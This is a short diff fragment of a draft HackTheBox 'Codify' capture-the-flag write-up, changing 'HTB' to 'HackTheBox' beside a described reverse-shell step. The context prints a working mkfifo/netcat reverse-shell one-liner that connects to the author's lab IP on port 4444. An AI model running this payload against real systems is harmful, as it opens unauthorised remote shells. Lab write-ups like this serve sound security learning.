sealldeveloper/sealldev-chirpy/_drafts/plaintexts/2024-1-1-codify-htb.md

 (local) pwncat$
 ```

-I go to [revshells.com](https://revshells.com) to craft a payload to send to the server, using my HTB private IP and port 4444.
+I go to [revshells.com](https://revshells.com) to craft a payload to send to the server, using my HackTheBox private IP and port 4444.

 I use the following payload: `rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc 10.10.***.*** 4444 >/tmp/f`